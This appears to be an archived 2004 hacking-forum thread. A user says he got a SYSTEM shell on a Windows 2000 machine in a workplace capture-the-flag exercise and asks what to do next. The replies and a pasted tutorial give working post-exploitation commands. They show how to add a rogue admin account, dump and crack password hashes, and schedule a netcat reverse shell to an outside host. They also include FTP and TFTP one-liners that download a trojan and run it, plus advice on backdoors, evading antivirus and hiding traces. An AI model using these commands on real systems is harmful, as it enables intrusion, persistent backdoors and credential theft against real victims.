We have a training exercise going on here at work, something like "capture the flag".
I was able to obtain a remote command shell with system level privelages from a W2K box, but I don't know what to do next?
My thoughts were maybe running pwdump3e to dump the hash, but I don't know how to run that remotely, because I don't have admin password yet.
I was able to use "enum" to enumerate username from my target machine, but I don't have any passwords.
The ports that are open on my target machine: 25, 80, 135, 139, 443, 445, 1025, 1026, 3389.
I also thought about mapping a share remotely, and then poking around on the target machine, to see if I can find the hidden flags, but I think I have to have a valid username and password to do that.
The goal of this exercise is for me to to be able to gain additional privelages(i.e administrator) and find files and scripts with passwords, network design, or any useful documents.
Any ideas?
brOmstar
Aug 18 2004, 01:33 PM
Simply add a new user to the admingroup and login at 3389 with a terminal client now u have full admin priviliges and a gui
mrBob
Aug 18 2004, 01:33 PM
you can upload pwdump to the remote computer with ftp.exe (just do a forum search and you'll see how to use it) you might want to install an ftp server for easy browsing or a vnc
or can't you run files with your privelages?
niko.noname
Aug 18 2004, 01:34 PM
Learn about the NET command, exactly how to create a user account and a share.
hint: net help
Greetz
Terminal
Aug 18 2004, 01:37 PM
you got a command shell with system level priviliges then just add a admin account and as 139 and 445 are open means netbios sahring is open . then in explorer type \\victimpc\c$ and enter user pass of ur admin account u created and u are in c$ with read write access . similarly d$ e$ for other drives .
annointed3
Aug 18 2004, 02:02 PM
Thank you all for your help. I'm going to the lab now and try some of your suggestions. I'll let you know how it turns out.
I also used a tool to check for "joe " accounts, and I think I found a few, but what exactly is a "joe account"?
Carny
Aug 18 2004, 03:07 PM
QUOTE (brOmstar @ Aug 18 2004, 01:33 PM)
Simply add a new user to the admingroup and login at 3389 with a terminal client now u have full admin priviliges and a gui
stupid question .... how can i add a new user ?? what do I need ?? what is a terminal client ??
KuerbY
Aug 18 2004, 03:11 PM
Use pwdump and dump the hashes to hashes.txt and download the txt file now use LC5 or when you have rainbowcrack tables rcrack normally you can crack all passwords. Or you add a new user with admin rights or you install a backdoor like radmin you have the choice
Carny
Aug 18 2004, 03:25 PM
QUOTE (KuerbY @ Aug 18 2004, 03:11 PM)
Use pwdump and dump the hashes to hashes.txt and download the txt file now use LC5 or when you have rainbowcrack tables rcrack normally you can crack all passwords. Or you add a new user with admin rights or you install a backdoor like radmin you have the choice
but how can somebody start or transfair r_admin without exec right ??
brOmstar
Aug 18 2004, 04:42 PM
grml u have system rights the rest is so simply but it depends on waht u want..
@cmdline with sys-priviliges type
net user username password /add net localgroup administrators username /add
(if domain controller add) net group "domain admins" username /add
after that is done simply open the remote desktop client on ur own box and connect to the ip(included in xp/downloadable at ms for 2000/under *nix use rdesktop as client)
logon screen appears use ur created account -> ur r admin with a full remote desktop session what u want more?
now u can do anything what u can do on ur own system !!
@carny u r the system u can do anything
annointed3
Aug 18 2004, 05:25 PM
Thanks again.
I used the tips given above and created a new user and added that user to the administrators group. I then connected to C$ and was able to view files on my target system. My co-worker who set up this lab, had files on the target system that contained username and passwords and I was able to find tthose files.
Next, I need to figure out how to upload tools? Can you do that with the remote administration utility? I'm getting ready to try that now.
Also, do you all know of any good backdoors for W2K?
Thanks again for your help.
Terminal
Aug 18 2004, 05:34 PM
dude think little bit . when u are connected to c$ just copy ur trojan server and pastes it somewhere and execute it fom dos box . thats all
mrBob
Aug 18 2004, 06:52 PM
QUOTE (vicky @ Aug 18 2004, 07:34 PM)
dude think little bit . when u are connected to c$ just copy ur trojan server and pastes it somewhere and execute it fom dos box . thats all
true but make sure you execute the backdoor from the cmd shell not from explorer view in the share (using double click) since that'll make the backdoor run on your computer
B3T4
Aug 18 2004, 07:08 PM
QUOTE (annointed3 @ Aug 18 2004, 01:27 PM)
Hi,
We have a training exercise going on here at work, something like "capture the flag".
then why are u asking all these questions, i mean, arent they teaching u anything?
besides, u ask us what to do next, i think u need to capture the flag...
and besides, if u have (created) an admin account and u can axx it using a remote screen why u need a backdoor for then ? U can do everything possible then so capture the so called flag.
flashb4ck
Aug 19 2004, 02:38 AM
nobody saiid that u can add an echo file :
echo open blablaftpserver PORT >> c:\whereuwant.txt echo user blaaaa >> c:\whereuwant.txt echo pass böaaa >> c:\whereuwant.txt echo BINARY >> c:\whereuwant.txt echo get troan.exe >> c:\whereuwant.txt echo get trojan.dll >> c:\whereuwant.txt echo quit
hehe
it'LL only work if ftp.exe is avaible
hf with capturing the logs u have left ^^
edit !: another example ;D
sex is like hacking , u get in u get out and u hope that u don't left something behind that can be traced back to u ^^
gr€€tZ fL4Shb4Ck
illwill
Aug 19 2004, 04:32 AM
might as well post it here since the trial members cant see it in the other forums
QUOTE
Tutorial started fall of 2003.
So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt' and you dont know what the (filtered) a command prompt is cuz you don't know shit about DOS and cant do anything without a pretty point-n-click GUI interface. and need to get your UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT - 0x01. The Basics + What are net commands? + What are some net commands? + What is NetBIOS? + Creating a local admin account. + How to transfer files to and from. + How do I execute those files remotely?
0x01. The Basics - What are net commands? ````````````````````````````````````````` What are net command exactly? Net commands are commands used in order to show information regarding a server or network which can include information on the servers, networks, shares, and connections. Other commands include commands in which you can edit user accounts, groups, and other configuration types.
0x01. The Basics - What are some net commands? `````````````````````````````````````````````` What are some net commands? There are various net commands in which you can use to view server info. Some of these net commands would include the ever popular NET use, NET share and NET view. But these arent the only net commands available. There is a wide variety of net command and they are as followed:
- NET Accounts - NET Print - NET Computer - NET Send - NET Config Server - NET Session - NET Config Workstation - NET Share - NET Continue - NET Statistics Server - NET File - NET Statistics Workstation - NET Group - NET Stop - NET Help - NET Time - NET Helpmsg - NET Use - NET Localgroup - NET User - NET Name - NET Ver - NET Pause - NET View
Net commands are great ways to spy on hacked windows NT servers because your checking on the network's status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use because they each do a certain thing which can be used for attacking. NET View, which is used to display a list of resources being shared on the attacked computer, NET Share which will display a list of information about all the resources that are being shared on the attacked computer which can also be used to create network shares, and last but not least NET Use which will display a list of connected computers which also has options for connecting and disconnecting from previously made shares. With those 3 commands, you have the ability to be able to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account and a backup shell. `````````````````````````````````````````````````` First off i always start off with making myself an admin on the computer just in case the shell is lost. Add your name to admin group: net user [username] [password] /add net localgroup administrators [username] /add ( C:\WINNT\System32>net user GOD 0wned /add ) ( C:\WINNT\System32>net localgroup administrators GOD /add )
***From muts from whitehat.co.il 8/19/04 Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed. There's nothing worse than losing the only single connection to a penetrated machine… I did this using the "at" command, sending myself a NetCat shell every 15 minutes. I found myself smiling every 15 minutes.
C:\WINDOWS>time time The current time is: 0:18:13.01 Enter the new time:
C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe"" at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe"" Added a new job with job ID = 1
0x01. The Basics - How to transfer files to and from. ````````````````````````````````````````````````````` Now's a good time to transfer some files here are some good methods of transferring files that i use:
1. Open the c: drive up for file sharing/transferring C:\>NET SHARE shareME=C: which u can connect to in your browser window \\victimsIP\shareME or type in YOUR dos prompt c:>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer) http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/ TFTP [-i] YOURIP [GET | PUT] source [destination] C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. from a command prompt echo ftp commands into a .bat file and execute it echo user <USERNAME> >>c:\$.tmp echo <PASSWORD> >>c:\$.tmp echo lcd c:\windows >>c:\$.tmp echo binary >>c:\$.tmp echo get <FILENAME.EXE> >>c:\$.tmp echo quit >>c:\$.tmp ftp -v -i -n -s:c:\$.tmp <FTP SITE> c:\$$.tmp <FILENAME.EXE> del c:\$.tmp del c:\$$.tmp
4. i have created a commandline webdownloader which allows you to grab a file from a website and execute it its more reliable when transferring files (ftp server have timeouts , TFTP uses UDP packets so it fails alot) http://illmob.org/stuff/cmdget.zip u need to get it on the server.exe using the above choices then you can use it normally cmdget http://blah.com/trojan.exe c:\0wned.exe well how would i get your exe onto the hacked server illwill u dumbass you might ask well you could use this program brainbuster made...basically its a gui front-end to create a debug script that you can paste into a shell line by line that will create a bat file that will re-compile the script into .exe http://illmob.org/stuff/exe2txt.zip
***Added from 101 on GSO forums 5/31/04 A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems: -*example*- your localip = 192.168.0.2 run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2 With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt) Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 *****
*i would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it like file transfers .. you would start nc listening on a port and then on your computer c:\>nc (vic_ip) (vic_port) < file.exe
Method #2 ftp downloading change the ftp.blah.com to the own ftp+dir and add your username/pass
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
Method #3 tftp downloading you need a tftp server running on yourself change the yourserver.com to your ip or dns name
-------------------- SNIP----------------------
tftp -i yourserver.com get yourfile.exe && start yourfile.exe ------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely? ````````````````````````````````````````````````````````` Having trouble trying to execute files remotely? Try PSEXEC http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/ psexec -u [username] -p [password] [command] if I created a user "GOD" with the password "0wn3d" C:\>psexec -u GOD -p 0wn3d blah.exe or if you wanna have their TFTP connect back to u and retrieve a file c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first, and if the computer doesnt have remote administrating disabled, or one of the ports firewalled out. or try RemoExec http://securityfriday.com/ToolDownload/Rem...emoxec_doc.html Remoxec executes a program using DCOM. Just supply an IP,USER,PASS,and the EXE you wanna execute.
this a working textfile that i have been kicking around ill keep adding to it sooner or later when i get some more time -peace illwill
Yorn
Aug 19 2004, 05:58 AM
htaver2.zip might still be on illwill's site. AFAIK, it's still working
On Sept 15th, this will have been out for officially one year without a fix. Much easier than tftp and ftp and etc. It can also be modded to get around AV, but I'll leave that learning up to the reader. Or I might come up with ver3 sometime.
What's great is you can replace test.exe with any exe of your choice.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
you have the choice 
. thats all
